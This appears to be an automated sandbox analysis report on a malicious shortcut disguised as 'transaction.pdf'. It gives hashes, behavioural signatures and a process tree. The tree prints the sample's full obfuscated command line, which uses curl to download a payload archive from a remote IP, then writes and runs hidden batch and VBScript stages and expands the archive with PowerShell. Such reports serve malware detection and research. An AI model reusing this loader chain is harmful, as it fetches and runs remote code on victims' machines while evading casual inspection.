Analysis
max time kernel: 117s
max time network: 118s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 10/11/2024, 22:06
Static task: static1
Behavioral task: behavioral1
  Sample: transaction.pdf.lnk
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: transaction.pdf.lnk
  Resource: win10v2004-20241007-en
General
Target: transaction.pdf.lnk
Size: 3KB
MD5: 0a2f22c7a16adfe8fbfa67b77edc82b4
SHA1: c2556809eee64ec4061a50d4ea2ee41d6781371f
SHA256: d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb
SHA512: 002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac
Malware Config
Signatures
Drops file in System32 directory (1 IoCs)
  description: File opened for modification
  ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  process: powershell.exe (PID 2964)
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  process: powershell.exe (PID 2964)
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description: Token: SeDebugPrivilege
  process: powershell.exe (PID 2964)
Suspicious use of WriteProcessMemory (12 IoCs)
  description                       pid   process      procid_target
  PID 2372 wrote to memory of 2204  2372  cmd.exe      31
  PID 2372 wrote to memory of 2204  2372  cmd.exe      31
  PID 2372 wrote to memory of 2204  2372  cmd.exe      31
  PID 2204 wrote to memory of 2664  2204  cmd.exe      32
  PID 2204 wrote to memory of 2664  2204  cmd.exe      32
  PID 2204 wrote to memory of 2664  2204  cmd.exe      32
  PID 2664 wrote to memory of 2780  2664  cscript.exe  34
  PID 2664 wrote to memory of 2780  2664  cscript.exe  34
  PID 2664 wrote to memory of 2780  2664  cscript.exe  34
  PID 2780 wrote to memory of 2964  2780  cmd.exe      36
  PID 2780 wrote to memory of 2964  2780  cmd.exe      36
  PID 2780 wrote to memory of 2964  2780  cmd.exe      36
Processes
[1] C:\Windows\system32\cmd.exe
    Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk
    PID: 2372
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/VORHPBAB/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""
      PID: 2204
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cscript.exe
        Command line: cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"
        PID: 2664
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat
          PID: 2780
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force
            PID: 2964
            - Drops file in System32 directory
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 448B
MD5: 8fa76d0dea5819256a19064f1639b35c
SHA1: 8dd913107ed46e6df0babd1996c67a65909592b9
SHA256: b54a02a81debd9191d15efa77bb915b298f4e7ba1e12638e8fa7280dc8e5b16a
SHA512: 468fb2dbf989657d9f0d1e39bb0a6213b5021b255c415a53bded8bc240eb49ae261e11c9904b481476dd9cc5f86e69338afd4fd953b46fb3bd294655d3533b48

Filesize: 129B
MD5: 88c7a65cabaeae2e10cbc7bd5608b28b
SHA1: d6ee96710a99d0f65a867c6082148ae7a4981227
SHA256: 250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
SHA512: b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340